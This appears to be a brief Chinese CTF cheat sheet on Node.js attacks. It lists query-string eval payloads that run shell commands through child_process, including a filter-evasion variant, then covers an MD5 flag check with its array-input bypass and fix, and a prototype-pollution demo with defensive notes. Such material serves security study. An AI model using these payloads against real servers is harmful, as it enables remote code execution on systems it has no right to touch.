Node.js 入个门

RCE:

?eval=require("child_process").execSync('ls')

?eval=require('child_process').execSync('ls').toString()

?eval=require("child_process")['exe'%2B'cSync']('ls')

?eval=require('child_process').spawnSync( 'ls', [ './' ] ).stdout.toString()

?eval=global.process.mainModule.constructor._load('child_process').execSync('ls')

弱比较:

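/* GET home page.
 *
 * Reads `a` and `b` from the query string and returns the flag only when
 * they are two different values of equal length whose salted MD5 digests
 * are identical; every other request renders the index view.
 *
 * Both values come straight from req.query, so they are untrusted and not
 * guaranteed to be strings: depending on the query-string parser, keys such
 * as `a[]=1` arrive as arrays (or objects). On arrays `.length` and `+ flag`
 * still work — the array is stringified — so two distinct array objects with
 * the same contents pass `a !== b` while `a + flag` and `b + flag` are equal,
 * and the flag is returned without any MD5 collision. Requiring both values
 * to be primitive strings closes that gap: for strings, "same length,
 * different content, same digest" needs a genuine collision of md5().
 */
router.get('/', function (req, res, next) {
  res.type('html');

  const flag = 'xxxxxxx';
  const { a, b } = req.query;

  // Reject anything the query parser turned into an array/object instead of
  // comparing it by its string form.
  const bothStrings = typeof a === 'string' && typeof b === 'string';

  if (
    bothStrings &&
    a &&
    b &&
    a.length === b.length &&
    a !== b &&
    md5(a + flag) === md5(b + flag)
  ) {
    res.end(flag);
  } else {
    res.render('index', { msg: 'tql' });
  }
});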

原型链污染:

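// Demonstration of prototype pollution through a recursive merge.
//
// JSON.parse gives "__proto__" no special meaning: it becomes an ordinary
// own property of o2 holding the object {"b": 2}. A merge helper that walks
// the source's keys recursively (`merge` is defined elsewhere in this
// write-up) then assigns into o1["__proto__"], which resolves to
// Object.prototype, so every plain object created afterwards — including
// the unrelated o3 — appears to have a `b` property.
//
// A defensive merge skips the keys "__proto__", "constructor" and
// "prototype", copies only Object.hasOwn keys, or merges into a
// Object.create(null) target / a Map so there is no prototype to reach.
const o1 = {};
const o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}');

merge(o1, o2);
console.log(o1.a, o1.b); // with a naive recursive merge this prints "1 2"

// The original wrote `o3 = {}` without a declaration: an implicit global in
// sloppy mode and a ReferenceError in strict mode / ES modules.
const o3 = {};
console.log(o3.b); // o3 was never merged into; a value here comes from the polluted prototype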